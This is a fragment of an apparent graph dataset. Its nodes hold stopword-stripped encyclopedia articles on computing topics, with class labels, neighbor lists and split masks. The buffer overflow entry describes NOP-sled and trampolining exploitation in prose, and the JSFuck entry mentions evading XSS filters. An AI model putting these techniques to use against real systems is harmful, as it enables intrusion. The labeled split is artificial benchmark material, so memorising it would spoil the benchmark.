3000s used command-line interpreter three-level hierarchical file system utilities compilers would resemble run fortran.pub.sys rather allowing programs run keyword commands later systems gained wide range languages including cobol fortran pascal c even version rpg assist winning business away ibm people used hp 3000 noticed 1970s onward machines reliable compared mainframe minicomputers time ability recover power failures notable feature sold many systems versus ibm computers times hp 3000 suffered peripheral support delays gaps caused hp decision delay supporting support peripherals hp 3000 platform—some supported identical hp 9000 hardware current computer instruction sets based general purpose register model processor memory architecture classic hp 3000 based stack machine model like hp well-known line rpn calculators said inspired famous stack-based burroughs large systems rather small number registers example ax bx register case hp 1000 operands would pushed stack used store local variables return addresses rather would 16-bit microcoded machines series ii iii 30 33 39 40 42 44 48 52 58 64 68 70 37 ... implement 16-bit word addressed byte-addressable segmented harvard stack instruction set architecture isa ~214 instructions 16 bits wide stack operations pack 2 per 16-bit word remaining 32 bits wide cisc implementations later 32-bit models used hp pa-risc general register-based risc architecture pa-risc implementations enterprise computing market shifted toward commodity unix systems wide range vendors—systems hp also promoting—in november 2001 hewlett-packard announced period called end-of-life hp 3000 would wrap end 2006 new systems would sold hp 2003 early 2006 hewlett-packard announced limited vendor support hp 3000 would extended two years certain clients geographic regions september 2007 hp extended support systems offering mature product support without sustaining engineering ending creation software patches patches built tested inside hp lacked customer base testing end 2008 hp made patches available end 2010 excel list beta patches 2011 hp extended special provision 3000 customers granted free access patches unlike rest hp enterprise line forced 2010 adopt pay patching support program instead free patches group independent vendors assumed systems software support existing customers left ranks hp 3000 support business several pledged continue support software customers stop using server others offering comprehensive support citing 2016 later end support dates consultants directory maintained robelle software independent consultants available listing openmpe website open source software resources including commodity tools 3000 mpe/ix operating system maintained website applied technologies hp 3000 enjoyed one longest lifetimes business computer system enterprise-grade computers outlasted highly regarded pdp-11 vax series although openvms operating system still offered alpha- ia-64-based systems hewlett packard products january 2012 stromasys announced development charon/hpa-3000 enables secure transfer hp3000 systems state-of-the-art environment stromasys solution virtualizes hardware existing hp3000 system enables mpe/ix operating system third party applications user-developed software run without modification whatsoever industry-standard intel servers offering includes two-user evaluation copy delivered vmware package",
    "neighbors": [
      512,
      7173,
      4998,
      5384,
      9353,
      7576,
      1702,
      58,
      11075,
      1606,
      3142,
      8524,
      11596,
      2638,
      9044,
      11604,
      7134,
      5094,
      5356,
      8944,
      2804,
      5492,
      3960,
      3323,
      2045,
      1278,
      9599
    ],
    "mask": "Test"
  },
  {
    "node_id": 1470,
    "label": 9,
    "text": "JSFuck:jsfuck jsfuck esoteric subset javascript code written using six characters codice_1 codice_2 codice_3 codice_4 codice_5 codice_6 name derived brainfuck esoteric programming language also uses minimalistic alphabet punctuation unlike brainfuck requires compiler interpreter jsfuck valid javascript code meaning jsfuck programs run web browser engine interprets javascript jsfuck able recreate javascript functionality using limited set characters javascript weakly typed programming language allows evaluation expression type july 2009 yosuke hasegawa created web application called jjencode could encode arbitrary javascript obfuscated form utilizing 18 symbols codice_7 january 2010 informal competition held obfuscation forum sla.ckers.org web application security site come way get minimum number characters required less eight codice_8 contributors thread managed eliminate need codice_9 codice_10 characters march 2010 online encoder called js-noalnum available utilized final set six characters end 2010 hasegawa made new encoder available named jsf*ck also used minimum six characters 2012 martin kleppe created jsfuck project github jsfuck.com website web app using implementation encoder jsfuck used bypass detection malicious code submitted websites e.g cross-site scripting xss attacks another potential use jsfuck lies code obfuscation optimized version jsfuck used encode jquery most-used javascript library fully functional version written six characters jsfuck code extremely verbose javascript code codice_11 causes pop-up window open 21 characters long jsfuck code length 22948 characters certain single characters require far 1000 characters expanded jsfuck section offers overview expansion works number 0 created codice_12 codice_13 empty array codice_6 unary plus used convert right side numeric value zero number 1 formed codice_15 codice_16 boolean value codice_17 expressed codice_18 codice_19 jsfuck converted numeric value 1 prepended plus sign digits 2 9 formed summing codice_17 appropriate number times e.g javascript codice_21 2 codice_17 codice_18 codice_19 hence 2 written codice_25 codice_26 digits follow similar pattern integers consisting two digits written string concatenating 1-digit arrays plus operator example string codice_27 expressed javascript codice_28 replacing digits respective jsfuck expansions yields codice_29 get numeric value instead string one would enclose previous expression parentheses square brackets prepend plus yielding codice_30 codice_31 letters obtained jsfuck accessing single characters string representations simple boolean numeric values like codice_32 codice_33 codice_34 codice_35 indexer number square brackets tricks needed produce letters – example casting string codice_36 number gives codice_37 turn makes letter codice_38 accessible following list primitive values used building blocks produce simple letters proof javascript codice_52 codice_53 codice_54 constructor used trigger execution javascript code contained string native javascript example statement codice_55 equivalent codice_56 codice_54 constructor retrieved jsfuck accessing constructor property well known function codice_58 codice_59 codice_55 becomes codice_61 characters shortest jsfuck expansions listed characters expressed well generate considerably longer code lacking distinct features usual javascript obfuscation techniques like jsfuck assist malicious javascript code bypassing intrusion prevention systems content filters instance lack alphanumeric characters jsfuck one hand flawed content filter hand allowed sellers embed arbitrary jsfuck scripts ebay auction pages",
    "neighbors": [
      8068,
      3462,
      6791,
      1802,
      6154,
      8605,
      1952,
      6176,
      5031,
      1203,
      438,
      7871,
      5311,
      5067,
      339,
      11221,
      7894,
      4056,
      9560,
      9561,
      8923,
      8289,
      7395,
      4198,
      9195,
      5101,
      10991,
      9714,
      10739,
      10744
    ],
    "mask": "Validation"
  },
  {
    "node_id": 1471,
    "label": 2,
    "text": "SmartQ_5:smartq 5 smartq 5 budget mobile internet device manufactured chinese company smart devices officially announced 11 february 2009 smartq 5 comes custom version ubuntu linux installed adapted use touchscreen uses lxde desktop environment ubuntu main pre-installed applications possible install another linux besides default os several linux distributions like mer ported android support smartq 5 smart devices obtained windows ce 6.0 royalty os made available official site although license microsoft needs purchased activate windows ce",
    "neighbors": [
      708,
      9163,
      7983,
      3537,
      659,
      2391,
      1822
    ],
    "mask": "Validation"
  },
  {
    "node_id": 1472,
    "label": 4,
    "text": "Mail_Abuse_Prevention_System:mail abuse prevention system mail abuse prevention system maps organization provides anti-spam support maintaining dnsbl provide five black lists categorising address ip block listed acronym maps spam spelled backwards maps founded 1996 non-profit organization pioneer innovative anti-spam techniques e-mail early history maps history dnsbls dave rand paul vixie well known internet software engineers started keeping list ip addresses sent spam engaged behavior found objectionable list became known real-time blackhole list rbl many network managers wanted use rbl block unwanted e-mail thus rand vixie created dns-based distribution scheme quickly became popular certain absolute right publish anti-spam blacklist maps published sue us page inviting spammers sue help create case law 2000 maps named defendant fewer three lawsuits sued yesmail media3 survey giant harris interactive first lawsuits came maps brought anne p. mitchell director legal public affairs 2001 company started require subscription accessing lists non-subscribed users received dummy unlisted response maps explained expectation get enough funds free support failed forced make decision however spirit company remained one non-profit organization subscription page quite hidden .org web site fax-based subscription mechanism rather awkward 2004 maps became division kelkea inc moved redwood city san jose .org .com dave rand founder ceo kelkea time june 2005 trend micro inc. acquired kelkea brought substantial improvement subscription mechanism including fully automated method getting temporary subscriptions addition subscribers provided personalised web pages view reports also set whitelisting blacklisting options whitelisting particularly convenient allows whitelist thousands ip addresses clicks proposing many lists confuse maps subscriber postmasters may hurriedly subscribe lists difference open proxy relays spam 'somehow open spam relay clear postmasters may conclude lists use spam block however one maps lists dul significantly different others dul supposed list addresses dynamically assigned end-users practice also includes statically-allocated ones directly related spam evidence maps archives address used relay spam dul purpose educate users relay mail acknowledged isp rather running mail servers would bring various advantages disadvantages acknowledged isps general afford monitor systems thoroughly order avoid viruses hijackers similar threats furthermore paves way effectively exploiting policies like spf rely upon end-user smtp authentication order block email address abuse also prevents users domain publish proper spf policy addition isp email relays incompatible fine-grained ip address blocking relay spam get blocked affects users maps fails disambiguate concepts acknowledged isp versus end-users ip addresses formal definition may relatively straightforward recognize isps network providers mailbox providers easily confused end-users different kinds coupled ability easily whitelist ips local internet registry/region correct obvious shortcomings using dul block mail may result obscure policy jeopardizes global reliability email delivery generates amount false positives much higher maps claims aware blocking many legitimate websites end users yet catching estimated 2 spam",
    "neighbors": [
      8224,
      5701,
      6762,
      8373,
      9909,
      127,
      5407
    ],
    "mask": "Test"
  },
  {
    "node_id": 1473,
    "label": 4,
    "text": "Cthulhu_(developer):cthulhu developer cthulhu aka thomas white british tor hidden service developer administrator activities involved consulted number tor security matters dark web scams law enforcement raids darknet markets hosted number data dumps including associated hacking team ashley madison patreon january 2016 hosted release files hacked fraternal order police november 2014 white arrested mastermind behind silk road 2 april 2019 white pleaded guilty charges including drug trafficking money laundering well making indecent images children sentenced total 5 years 4 months prison",
    "neighbors": [
      5024,
      1251
    ],
    "mask": "None"
  },
  {
    "node_id": 1474,
    "label": 4,
    "text": "Buffer_overflow:buffer overflow information security programming buffer overflow buffer overrun anomaly program writing data buffer overruns buffer boundary overwrites adjacent memory locations buffers areas memory set aside hold data often moving one section program another programs buffer overflows often triggered malformed inputs one assumes inputs smaller certain size buffer created size anomalous transaction produces data could cause write past end buffer overwrites adjacent data executable code may result erratic program behavior including memory access errors incorrect results crashes exploiting behavior buffer overflow well-known security exploit many systems memory layout program system whole well defined sending data designed cause buffer overflow possible write areas known hold executable code replace malicious code selectively overwrite data pertaining program state therefore causing behavior intended original programmer buffers widespread operating system os code possible make attacks perform privilege escalation gain unlimited access computer resources famed morris worm 1988 used one attack techniques programming languages commonly associated buffer overflows include c c++ provide built-in protection accessing overwriting data part memory automatically check data written array built-in buffer type within boundaries array bounds checking prevent buffer overflows requires additional code processing time modern operating systems use variety techniques combat malicious buffer overflows notably randomizing layout memory deliberately leaving space buffers looking actions write areas canaries buffer overflow occurs data written buffer also corrupts data values memory addresses adjacent destination buffer due insufficient bounds checking occur copying data one buffer another without first checking data fits within destination buffer following example expressed c program two variables adjacent memory 8-byte-long string buffer two-byte big-endian integer b initially contains nothing zero bytes b contains number 1979 program attempts store null-terminated string ascii encoding buffer b value inadvertently replaced number formed part character string example e followed zero byte would become 25856 writing data past end allocated memory sometimes detected operating system generate segmentation fault error terminates process prevent buffer overflow happening example call strcpy could replaced strlcpy takes maximum capacity including null-termination character additional parameter ensures amount data written available strlcpy library function preferred strncpy null-terminate destination buffer source string length greater equal size buffer third argument passed function therefore may null-terminated treated valid c-style string techniques exploit buffer overflow vulnerability vary architecture operating system memory region example exploitation heap used dynamically allocated memory differs markedly exploitation call stack technically inclined user may exploit stack-based buffer overflows manipulate program advantage one several ways address user-supplied data used affect stack buffer overflow unpredictable exploiting stack buffer overflow cause remote code execution becomes much difficult one technique used exploit buffer overflow called trampolining technique attacker find pointer vulnerable stack buffer compute location shellcode relative pointer use overwrite jump instruction already memory make second jump time relative pointer second jump branch execution shellcode suitable instructions often present large code metasploit project example maintains database suitable opcodes though lists found windows operating system buffer overflow occurring heap data area referred heap overflow exploitable manner different stack-based overflows memory heap dynamically allocated application run-time typically contains program data exploitation performed corrupting data specific ways cause application overwrite internal structures linked list pointers canonical heap overflow technique overwrites dynamic memory allocation linkage malloc meta data uses resulting pointer exchange overwrite program function pointer microsoft gdi+ vulnerability handling jpegs example danger heap overflow present manipulation buffer occurs read executed may lead failure exploitation attempt manipulations mitigate threat exploitation may make impossible manipulations could include conversion upper lower case removal metacharacters filtering non-alphanumeric strings however techniques exist bypass filters manipulations alphanumeric code polymorphic code self-modifying code return-to-libc attacks methods used avoid detection intrusion detection systems cases including code converted unicode threat vulnerability misrepresented disclosers denial service fact remote execution arbitrary code possible real-world exploits variety challenges need overcome exploits operate reliably factors include null bytes addresses variability location shellcode differences environments various counter-measures operation nop-sled oldest widely known technique successfully exploiting stack buffer overflow solves problem finding exact address buffer effectively increasing size target area much larger sections stack corrupted no-op machine instruction end attacker-supplied data no-op instructions attacker places instruction perform relative jump top buffer shellcode located collection no-ops referred nop-sled return address overwritten address within no-op region buffer execution slide no-ops redirected actual malicious code jump end technique requires attacker guess stack nop-sled instead comparatively small shellcode popularity technique many vendors intrusion prevention systems search pattern no-op machine instructions attempt detect shellcode use important note nop-sled necessarily contain traditional no-op machine instructions instruction corrupt machine state point shellcode run used place hardware assisted no-op result become common practice exploit writers compose no-op sled randomly chosen instructions real effect shellcode execution method greatly improves chances attack successful without problems exploits using technique still must rely amount luck guess offsets stack within nop-sled region incorrect guess usually result target program crashing could alert system administrator attacker activities another problem nop-sled requires much larger amount memory hold nop-sled large enough use problem allocated size affected buffer small current depth stack shallow i.e much space end current stack frame start stack despite problems nop-sled often method work given platform environment situation still important technique jump register technique allows reliable exploitation stack buffer overflows without need extra room nop-sled without guess stack offsets strategy overwrite return pointer something cause program jump known pointer stored within register points controlled buffer thus shellcode example register contains pointer start buffer jump call taking register operand used gain control flow execution practice program may intentionally contain instructions jump particular register traditional solution find unintentional instance suitable opcode fixed location somewhere within program memory figure left see example unintentional instance i386 codice_1 instruction opcode instruction codice_2 two-byte sequence found one-byte offset start instruction codice_3 address codice_4 attacker overwrites program return address address program first jump codice_4 interpret opcode codice_2 codice_1 instruction jump top stack execute attacker code technique possible severity vulnerability increases considerably exploitation work reliably enough automate attack virtual guarantee success run reason technique commonly used internet worms exploit stack buffer overflow vulnerabilities method also allows shellcode placed overwritten return address windows platform since executables mostly based address codice_8 x86 little endian architecture last byte return address must null terminates buffer copy nothing written beyond limits size shellcode size buffer may overly restrictive dlls located high memory codice_9 addresses containing null bytes method remove null bytes disallowed characters overwritten return address used way method often referred dll trampolining various techniques used detect prevent buffer overflows various tradeoffs reliable way avoid prevent buffer overflows use automatic protection language level sort protection however applied legacy code often technical business cultural constraints call vulnerable language following sections describe choices implementations available assembly c/c++ popular programming languages vulnerable buffer overflow part allow direct access memory strongly typed c provides built-in protection accessing overwriting data part memory specifically check data written buffer within boundaries buffer standard c++ libraries provide many ways safely buffering data c++ standard template library stl provides containers optionally perform bounds checking programmer explicitly calls checks accessing data example codice_10 member function codice_11 performs bounds check throws codice_12 exception bounds check fails however c++ behaves like c bounds check explicitly called techniques avoid buffer overflows also exist c. languages strongly typed n't allow direct memory access cobol java python others prevent buffer overflow occurring cases many programming languages c/c++ provide runtime checking cases even compile-time checking might send warning raise exception c c++ would overwrite data continue execute instructions erroneous results obtained might might cause program crash examples languages include ada eiffel lisp modula-2 smalltalk ocaml c-derivatives cyclone rust d. java .net framework bytecode environments also require bounds checking arrays nearly every interpreted language protect buffer overflows signaling well-defined error condition often language provides enough type information bounds checking option provided enable disable static code analysis remove many dynamic bound type checks poor implementations awkward cases significantly decrease performance software engineers must carefully consider tradeoffs safety versus performance costs deciding language compiler setting use problem buffer overflows common c c++ languages expose low level representational details buffers containers data types buffer overflows must thus avoided maintaining high degree correctness code performs buffer management also long recommended avoid standard library functions bounds checked codice_13 codice_14 codice_15 morris worm exploited codice_13 call fingerd well-written tested abstract data type libraries centralize automatically perform buffer management including bounds checking reduce occurrence impact buffer overflows two main building-block data types languages buffer overflows commonly occur strings arrays thus libraries preventing buffer overflows data types provide vast majority necessary coverage still failure use safe libraries correctly result buffer overflows vulnerabilities naturally bug library potential vulnerability safe library implementations include better string library vstr erwin openbsd operating system c library provides strlcpy strlcat functions limited full safe library implementations september 2007 technical report 24731 prepared c standards committee published specifies set functions based standard c library string i/o functions additional buffer-size parameters however efficacy functions purpose reducing buffer overflows disputable requires programmer intervention per function call basis equivalent intervention could make analogous older standard library functions buffer overflow safe buffer overflow protection used detect common buffer overflows checking stack altered function returns altered program exits segmentation fault three systems libsafe stackguard propolice gcc patches microsoft implementation data execution prevention dep mode explicitly protects pointer structured exception handler seh overwritten stronger stack protection possible splitting stack two one data one function returns split present forth language though security-based design decision regardless complete solution buffer overflows sensitive data return address may still overwritten buffer overflows work manipulating pointers including stored addresses pointguard proposed compiler-extension prevent attackers able reliably manipulate pointers addresses approach works compiler add code automatically xor-encode pointers used attacker theoretically know value used encode/decode pointer predict point overwrites new value pointguard never released microsoft implemented similar approach beginning windows xp sp2 windows server 2003 sp1 rather implement pointer protection automatic feature microsoft added api routine called discretion programmer allows better performance used time places burden programmer know necessary xor linear attacker may able manipulate encoded pointer overwriting lower bytes address allow attack succeed attacker able attempt exploit multiple times able complete attack causing pointer point one several locations location within nop sled microsoft added random rotation encoding scheme address weakness partial overwrites executable space protection approach buffer overflow protection prevents execution code stack heap attacker may use buffer overflows insert arbitrary code memory program executable space protection attempt execute code cause exception cpus support feature called nx execute xd execute disabled bit conjunction software used mark pages data containing stack heap readable writable executable unix operating systems e.g openbsd macos ship executable space protection e.g w^x optional packages include newer variants microsoft windows also support executable space protection called data execution prevention proprietary add-ons include executable space protection generally protect return-to-libc attacks attack rely execution attackers code however 64-bit systems using aslr described executable space protection makes far difficult execute attacks address space layout randomization aslr computer security feature involves arranging positions key data areas usually including base executable position libraries heap stack randomly process address space randomization virtual memory addresses functions variables found make exploitation buffer overflow difficult impossible also forces attacker tailor exploitation attempt individual system foils attempts internet worms similar less effective method rebase processes libraries virtual address space use deep packet inspection dpi detect network perimeter basic remote attempts exploit buffer overflows use attack signatures heuristics able block packets signature known attack long series no-operation instructions known nop-sled detected used location exploit payload slightly variable packet scanning effective method since prevent known attacks many ways nop-sled encoded shellcode used attackers made alphanumeric metamorphic self-modifying evade detection heuristic packet scanners intrusion detection systems checking buffer overflows patching bugs cause naturally helps prevent buffer overflows one common automated technique discovering fuzzing edge case testing also uncover buffer overflows static analysis potential buffer overflow detected must patched makes testing approach useful software development less useful legacy software longer maintained supported buffer overflows understood partially publicly documented early 1972 computer security technology planning study laid technique code performing function check source destination addresses properly permitting portions monitor overlaid user used inject code monitor permit user seize control machine today monitor would referred kernel earliest documented hostile exploitation buffer overflow 1988 one several exploits used morris worm propagate internet program exploited service unix called finger later 1995 thomas lopatic independently rediscovered buffer overflow published findings bugtraq security mailing list year later 1996 elias levy also known aleph one published phrack magazine paper smashing stack fun profit step-by-step introduction exploiting stack-based buffer overflow vulnerabilities since least two major internet worms exploited buffer overflows compromise large number systems 2001 code red worm exploited buffer overflow microsoft internet information services iis 5.0 2003 sql slammer worm compromised machines running microsoft sql server 2000 2003 buffer overflows present licensed xbox games exploited allow unlicensed software including homebrew games run console without need hardware modifications known modchips ps2 independence exploit also used buffer overflow achieve playstation 2 twilight hack accomplished wii using buffer overflow",
    "neighbors": [
      5636,
      3603,
      7187,
      541,
      3101,
      2041,
      7717,
      3624,
      5165,
      2045,
      5682,
      7734,
      5176,
      5179,
      2625,
      2115,
      8773,
      8262,
      11334,
      6730,
      10316,
      6221,
      6735,
      4689,
      8787,
      86,
      10333,
      6751,
      1122,
      6754,
      9317,
      4198,
      2152,
      3178,
      3704,
      634,
      5245,
      9854,
      5249,
      642,
      4747,
      6797,
      4755,
      2709,
      2717,
      161,
      8867,
      7851,
      2732,
      10412,
      7855,
      9393,
      10417,
      10933,
      11446,
      3270,
      1736,
      9932,
      5325,
      8399,
      5840,
      7889,
      3283,
      1748,
      6868,
      2262,
      9432,
      1242,
      1247,
      8930,
      4836,
      6373,
      7403,
      5356,
      11500,
      7920,
      5365,
      8956,
      5373,
      10492,
      2304,
      5888,
      3852,
      9490,
      11539,
      9214,
      5911,
      11030,
      3867,
      1820,
      5404,
      3871,
      814,
      815,
      7983,
      817,
      311,
      4407,
      2878,
      2367,
      3904,
      4424,
      331,
      855,
      4439,
      11103,
      6497,
      8545,
      6502,
      2409,
      372,
      5492,
      7031,
      8573,
      7039,
      8066,
      3462,
      5008,
      3473,
      8080,
      1429,
      3486,
      2975,
      5024,
      6558,
      1954,
      939,
      428,
      9646,
      5040,
      7601,
      6579,
      3512,
      5071,
      4562,
      5074,
      5080,
      4572,
      3039,
      7135,
      7139,
      4582,
      4071,
      3048,
      8167,
      4074,
      2027,
      10727,
      3573,
      3577,
      5117,
      2558
    ],
    "mask": "Test"
  },
  {
    "node_id": 1475,
    "label": 4,
    "text": "Gutmann_method:gutmann method gutmann method algorithm securely erasing contents computer hard disk drives files devised peter gutmann colin plumb presented paper secure deletion data magnetic solid-state memory july 1996 involved writing series 35 patterns region erased selection patterns assumes user know encoding mechanism used drive includes patterns designed specifically three types drives user knows type encoding drive uses choose patterns intended drive drive different encoding mechanism would need different patterns patterns gutmann method designed older mfm/rll encoded disks gutmann noted modern drives longer use older encoding techniques making parts method irrelevant said time since paper published people treated 35-pass overwrite technique described kind voodoo incantation banish evil spirits result technical analysis drive encoding techniques since 2001 ata ide sata hard drive manufacturer designs include support ata secure erase standard obviating need apply gutmann method erasing entire drive however 2011 research found 4 8 manufacturers implement ata secure erase correctly one standard way recover data overwritten hard drive capture process analog signal obtained drive read/write head prior analog signal digitized analog signal close ideal digital signal differences reveal important information calculating ideal digital signal subtracting actual analog signal possible amplify obtained difference signal use determine previously written disk example done see previous data written however even overwriting disk repeatedly random data theoretically possible recover previous signal permittivity medium changes frequency magnetic field means lower frequency field penetrate deeper magnetic material drive high frequency one low frequency signal theory still detectable even overwritten hundreds times high frequency signal patterns used designed apply alternating magnetic fields various frequencies various phases drive surface thereby approximate degaussing material surface drive overwrite session consists lead-in four random write patterns followed patterns 5 31 see rows table executed random order lead-out four random patterns patterns 5 31 designed specific magnetic media encoding scheme mind pattern targets drive written passes even though table shows bit patterns passes specifically targeted encoding scheme end result obscure data drive advanced physical scanning e.g. using magnetic force microscope drive likely able recover data series patterns follows encoded bits shown bold present ideal pattern although due encoding complementary bit actually present start track delete function operating systems simply marks space occupied file reusable removes pointer file without immediately removing contents point file fairly easily recovered numerous recovery applications however space overwritten data known way use software recover done software alone since storage device returns current contents via normal interface gutmann claims intelligence agencies sophisticated tools including magnetic force microscopes together image analysis detect previous values bits affected area media example hard disk daniel feenberg national bureau economic research american private nonprofit research organization criticized gutmann claim intelligence agencies likely able read overwritten data citing lack evidence claims nevertheless published government security procedures consider disk overwritten still sensitive gutmann responded criticisms also criticized algorithm abused epilogue original paper states",
    "neighbors": [
      2432,
      3841,
      3972,
      8997,
      2534,
      9319,
      11368,
      7369,
      3114,
      2859,
      6699,
      6382,
      11695,
      7090,
      9086,
      10195,
      6494,
      831
    ],
    "mask": "Test"
  },
  {
    "node_id": 1476,
    "label": 8,
    "text": "WS-Policy4MASC:ws-policy4masc ws-policy4masc policy language managing web services composition ws-policy4masc extends widely used industrial standard ws-policy information necessary run-time management including unique support autonomic business-driven management bdim specifications diverse financial non-financial business value metrics business strategies guide business-value driven selection among alternative control adaptation actions main distinctive characteristics contributions ws-policy4masc ws-policy4masc also supports management aspects fault management maximization technical qos metrics built-in constructs specification wide range adaptations events common management service-oriented systems business processes implement 1 tosic v. erradi a. maheshwari p. 2007 ws-policy4masc ws-policy extension used manageable adaptable service compositions masc middleware van der aalst w.m.p. l.-j zhang p.c.k hung eds proceedings scc 2007 pp 458–465 los alamitos usa ieee-cs press",
    "neighbors": [
      10020,
      6357
    ],
    "mask": "None"
  },
  {
    "node_id": 1477,
    "label": 4,
    "text": "Global_waste_trade:global waste trade global waste trade international trade waste countries treatment disposal recycling toxic hazardous wastes often exported developed countries developing countries also known countries global south therefore burden toxicity wastes western countries falls predominantly onto developing countries africa asia latin america world bank report waste global review solid waste management describes amount solid waste produced given country specifically countries produce solid waste economically developed industrialized report explains g enerally higher economic development rate urbanization greater amount solid waste produced. ” therefore countries global north economically developed urbanized produce solid waste global south countries current international trade flows waste follow pattern waste produced global north exported disposed global south multiple factors affect countries produce waste magnitude including geographic location degree industrialization level integration global economy numerous scholars researchers linked sharp increase waste trading negative impacts waste trading prevalence neoliberal economic policy major economic transition towards neoliberal economic policy 1980s shift towards “ free-market ” policy facilitated sharp increase global waste trade henry giroux chair cultural studies mcmaster university gives definition neoliberal economic policy “ neoliberalism ... removes economics markets discourse social obligations social costs ... policy political project neoliberalism wedded privatization public services selling state functions deregulation finance labor elimination welfare state unions liberalization trade goods capital investment marketization commodification society. ” given economic platform privatization neoliberalism based expanding free-trade agreements establishing open-borders international trade markets trade liberalization neoliberal economic policy trade completely deregulated leaving tariffs quotas restrictions international trade designed developing countries ’ economies integrate global economy critics claim although free-market trade liberalization designed allow country opportunity reach economic success consequences policies devastating global south countries essentially crippling economies servitude global north even supporters international monetary fund “ progress integration uneven recent decades ” specifically developing countries targeted trade liberalization policies import waste means economic expansion guiding neoliberal economic policy argues way integrated global economy participate trade liberalization exchange international trade markets claim smaller countries less infrastructure less wealth less manufacturing ability take hazardous wastes way increase profits stimulate economies current supporters global waste trade argue importing waste economic transaction benefit countries little offer global economy countries production capacity manufacture high quality products import waste stimulate economy lawrence summers former president harvard university chief economist world bank issued confidential memo arguing global waste trade 1991 memo stated think economic logic behind dumping load toxic waste lowest wage country impeccable face that… ’ always thought countries africa vastly polluted air quality probably vastly inefficiently low compared los angeles… n't world bank encouraging migration dirty industries least developed countries position mainly motivated economics financial profit particular demonstrates main argument global waste trade cato institute published article supporting global waste trade suggesting “ little evidence hazardous wastes often chronic carcinogens contribute death rates developing countries. ” elaborating point article argues “ people developing countries would rationally accept increased exposure hazardous pollutants exchange opportunities increase productivity—and hence income. ” overall argument global waste trade rests largely upon perception developing countries need economic development supporters suggest engaging global waste trade developing countries global south expand economies increase profits critics global waste trade claim lack regulation failed policies allowed developing nations become toxic dump yards hazardous waste ever-increasing amounts hazardous waste shipped developing countries increases disproportionate risk people nations face critics effects global waste trade emphasize enormous amount hazardous wastes people poorer countries must deal highlight fact world ’ hazardous wastes produced western countries united states europe yet people suffer negative health effects wastes poorer countries produce waste peter newell professor development studies argues “ environmental inequality reinforces time reflects forms hierarchy exploitation along lines class race gender. ” arguing detrimental effects hazardous waste trade affect disadvantaged others critics global waste trade suggest implications dumping hazardous waste significant consequences people color women low-income people particular critiquing global waste trade reproducing inequality global scale many activists organizers environmentalists regions affected global south vocalized disappointment global waste trade policies evo morales first indigenous amerindian president bolivia argues current economic system forcing exploitation country people claims want save planet earth save life humanity duty put end capitalist system unless put end capitalist system impossible imagine equality justice planet earth believe important put end exploitation human beings pillage natural resources put end destructive wars markets raw materials plundering energy particularly fossil fuels excessive consumption goods accumulation waste capitalist system allows us heap waste jean francois kouadio african native living near toxic dump site ivory coast explains experience effects toxic substances lingering throughout community major western corporations dumping toxic wastes ivory coast kuoadio lost two children effects toxic wastes describes loss second daughter ama grace doctors said suffered acute glycemia caused toxic waste addition critics global south researchers scholars west begun critiquing uneven distribution negative effects hazardous waste dumpings causing dorceta taylor professor university michigan argues women color united states disproportionately affected policies women color forefront struggle bring attention issues devastating minority communities – issues hazardous waste disposal exposure toxins ... communities degraded environments ... repositories waste products capitalist production excessive consumption result vanguard struggle environmental justice founders environmental groups grassroots activists researchers conference organizers workshop leaders lobbyists campaign community organizers t.v reed professor english american studies washington state university argues correlation historical colonialism toxic colonialism based perceptions indigenous land ‘ waste. ’ argues western cultures deemed indigenous land “ underdeveloped ” “ empty ” people inhabiting therefore less “ civilized. ” using historical premises colonialism toxic colonialism reproduces arguments defining global south land expendable western wastes toxic colonialism defined process “ underdeveloped states used inexpensive alternatives export disposal hazardous waste pollution developed states ” core critique global waste trade toxic colonialism represents neocolonial policy continues maintain global inequality today unfair trade systems toxic colonialism uses term colonialism “ characteristics colonialism involving economic dependence exploitation labour cultural inequality intimately associated within new realm toxic waste colonialism. ” electronic waste also known e-waste refers discarded electrical electronic devices rapidly growing surplus electronic waste around world resulted quickly evolving technological advances changes media tapes software mp3 falling prices planned obsolescence estimated 50 million tons e-waste produced year majority comes united states europe electronic waste shipped developing countries asia africa processed recycled various studies investigated environmental health effects e-waste upon people live work around electronic waste dumps heavy metals toxins chemicals leak discarded products surrounding waterways groundwater poisoning local people people work dumps local children searching items sell people living surrounding communities exposed deadly toxins one city suffering negative results hazardous waste trade guiyu china called electronic waste dump world may world largest e-waste dump workers dismantling 1.5 million pounds junked computers cell phones electronic devices per year incinerator ash ash produced incinerators burn waste order dispose incineration many polluting effects include release various hazardous gases heavy metals sulfur dioxide example incinerator ash dumped onto global south global north unjust trade exchange khian sea waste disposal incident carrying 14,000 tons ash incinerator philadelphia cargo ship khian sea dispose waste however upon rejected dominican republic panama honduras bermuda guinea bissau dutch antilles crew finally dumped portion ash near haiti changing name ship twice try conceal original identity senegal morocco yemen sri lanka singapore still banned ship ’ entry upon consistent rejections ash believed disposed atlantic indian oceans following disaster handling hazardous waste haitian government banned waste imports leading movement recognize disastrous consequences global waste trade based khian sea waste disposal incident similar events basel convention written resist known developing countries ‘ toxic colonialism. ’ open signature march 1989 went effect may 1992 u.s. signed treaty yet ratify chemical waste excess unusable waste hazardous chemicals mainly produced large factories extremely difficult costly dispose poses many problems health risks upon exposure must carefully treated toxic waste processing facilities one example chemical waste exported global north onto global south event italian business man seeking avoid european economic regulations allegedly exporting 4,000 tons toxic waste containing 150 tons polychlorinated biphenyls pcbs italian businessman made 4.3 million shipping hazardous waste nigeria fordham environmental law review published article explaining impacts toxic waste imposed nigeria detail mislabelling garbage fertilizers italian company deceived retired/illiterate timber worker agreeing store poison backyard nigerian river port koko little 100 dollars month toxic chemicals exposed hot sun children playing nearby leaked koko water system resulting death nineteen villagers ate contaminated rice nearby farm one example traditional trade flow developed western countries severely unfairly disproportionately impacted developing countries global south another danger developing countries growing issue shipbreaking occurring mainly asia industrialized countries seeking retire used vessels find cheaper send ships asia dismantling china bangladesh seen two hubs shipbreaking asia one main issues lies fact ships aged continue constructed time less environmental regulation environmental fact sheet researchers demonstrate immense impact new toxic trade sector workers environment one older ships contain health-damaging substances asbestos lead oxide zinc chromates mercury arsenic tributyltin addition shipbreaking workers china developing countries traditionally lack proper equipment protective gear handling toxic substances global waste trade negative effects many people particularly poorer developing nations countries often safe recycling processes facilities people process toxic waste bare hands hazardous wastes often properly disposed treated leading poisoning surrounding environment resulting illness death people animals many people experienced illnesses death due unsafe way hazardous wastes handled hazardous waste trade disastrous effects upon environment natural ecosystems various studies explore concentrations persistent organic pollutants poisoned areas surrounding dump sites killing numerous birds fish wildlife heavy metal chemical concentrations air water soil sediment around toxic dump areas concentration levels heavy metals areas extremely high toxic hazardous waste trade serious damaging effects upon health humans people living developing countries may vulnerable dangerous effects hazardous waste trade particularly risk developing health problems methods disposal toxic wastes developing countries expose general population including future generations 